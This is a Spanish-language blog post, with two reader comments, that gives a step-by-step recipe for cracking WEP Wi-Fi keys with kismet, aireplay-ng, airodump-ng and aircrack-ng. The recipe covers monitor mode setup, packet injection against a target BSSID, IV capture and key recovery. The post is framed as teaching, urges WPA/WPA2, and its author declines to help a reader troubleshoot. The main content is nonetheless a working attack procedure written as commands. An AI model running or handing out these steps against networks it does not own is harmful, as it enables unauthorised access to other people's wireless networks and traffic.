sábado, 8 de septiembre de 2007

aircrack-ng y kismet, desproteger WIFI

Esto es solo en plan didáctico para que aprendamos como nos pueden piratear nuestra conexión a internet en tan solo un par de minutos, para evitar eso mejor que cifremos nuestra conexión mediante los cifrados: wpa y wpa2

La seguridad en las redes inalámbricas es un tema muy serio que produce serios quebraderos de cabeza a aquellos que sienten importante la información que protegen o simplemente no quieren a medio país conectándose a través de su red a Internet. Para ello, con el tiempo, se han ido diseñando distintos sistemas de cifrado de datos para este tipo de redes.

El más popular de los mecanismos actualmente en uso es WEP (Wired Equivalent Privacy), aunque la certeza de su debilidad ha dado paso a la creación de un sistema mucho más robusto llamado WPA (Wi-Fi Protected Access). La debilidad de WEP es algo que todo el mundo conoce, aunque también se tenía en cuenta, hasta ahora, que era una tarea realmente ardua descifrar la clave. Ahora, el FBI se ha encargado de demostrar que no sólo NO ES TAN DIFICIL crackear la clave WEP, sino que se trata de un proceso sencillo, de escasos 3 minutos, que cualquiera puede realizar utilizando herramientas que se pueden adquirir gratis en Internet. Por ello, y por la importancia del asunto, he decidido traducir la narración que Humphrey Cheung, asistente a la demostración, ha realizado de este “ataque WEP”.

Esto es solo en plan didáctico para que aprendamos como nos pueden piratear nuestra conexión a internet en tan solo un par de minutos, por eso es mejor que cifremos nuestra conexión mediante los cifrados: wpa y wpa2


Una vez instalado y configurado el WIFI, tenemos que instalar la suit
e airckarck-ng y kismet

# apt-get install aircrack-ng
# apt-get install kismet

Debemos configurar Kismet para que funcione con bcm43xx, o con Atheros (AR5212) editaremos el archivo según nuestra tarjeta
/etc/kismet/kismet.conf
buscaremos la linea
source=none,none,none
y la dejaremos así, en este caso en un broadcom:
source=bcm43xx,eth1,broadcom

o así, dependiendo de nuestra tarjeta de red, en este caso es Atheros (AR5212):
source=madwifi_g,wifi0,madwifi-ng

Ahora que tenemos las herramientas, solo me queda aclarar unas cosas:

ESSID: Es el nombre o identificador de las redes wifi
BSSID: Es la dirección MAC de los puntos de acceso o routers inalámbricos
¿Cuantos paquetes necesito capturar?: Depende de la longitud de la clave WEP
<= 128 bits recomendables al menos 300.000 >= 128 bits a partir de 1.000.000
¿Donde veo los paquetes que llevo capturados?:
En la consola que esta airodump-ng ejecutándose en la columna # Data

OK, comencemos:

1-Paramos la tarjeta
# ifconfig eth1 down

2 -Establecemos a 1 M/s el ancho de banda, para tener muy buena visión y mucha distancia de alcance.
# iwconfig eth1 rate 1M

3- Ponemos la tarjeta en modo monitor
# airmon-ng eth1 start

7- Hacemos un escaneo de redes en modo monitor y obtenemos ESSID, BSSID y el canal de la red que estamos probando, y terminamos de preparar la tarjeta.

# kismet

8- Ahora abriremos dos consolas una para aireplay-ng y otra para airodump-ng


9- Comenzamos a inyectar paquetes
# aireplay-ng -CANAL -b BSSID -h DIRECCION-MAC-DE-bcm43xx eth1

10- Comenzamos a capturar paquetes IVs
# airodump-ng --ivs -c CANAL -w ESSID eth1

Una vez que tengamos la cantidad de paquetes deseados paramos aireplay-ng y airodump-ng y seguimos con el ultimo paso.

11- Obtenemos la clave
# aircrack-ng ESSID-01.ivs



Este proceso no debería llevar mas de 1 ó 2 minutos. En caso de que no saque la contraseña sera necesario capturar mas paquetes


Esto es solo en plan didáctico para que aprendamos como nos pueden piratear nuestra conexión a internet en tan solo un par de minutos, por eso es mejor que cifremos nuestra conexión mediante los cifrados: wpa y wpa2







.

2 comentarios:

Anónimo dijo...

Cuando llego a este paso me marca lo siguiente:

roma@roma-laptop:~$ sudo kismet
Server options: none
Client options: none
Starting server...
Waiting for server to start before starting UI...
Suid priv-dropping disabled. This may not be secure.
No specific sources given to be enabled, all will be enabled.
Enabling channel hopping.
Enabling channel splitting.
Source 0 (broadcom): Enabling monitor mode for bcm43xx source interface eth1 channel 6...
FATAL: Failed to set monitor mode: Invalid argument. This usually means your drivers either do not support monitor mode, or use a different mechanism for getting to it. Make sure you have a version of your drivers that support monitor mode, and consult the troubleshooting section of the README.
[1] + Done(1) ${BIN}/kismet_server --silent ${server}
roma@roma-laptop:~$

que puedo hacer????

saludos

jorge

Usuario_Debian dijo...

Siento no poderte ayudar, pues esta entrada la puse mas bien como precaución a nuestra red wifi, con fines didáctico para prevenir el crackeo de esta. Con lo cual no doy soporte a este tipo de software.

saludos.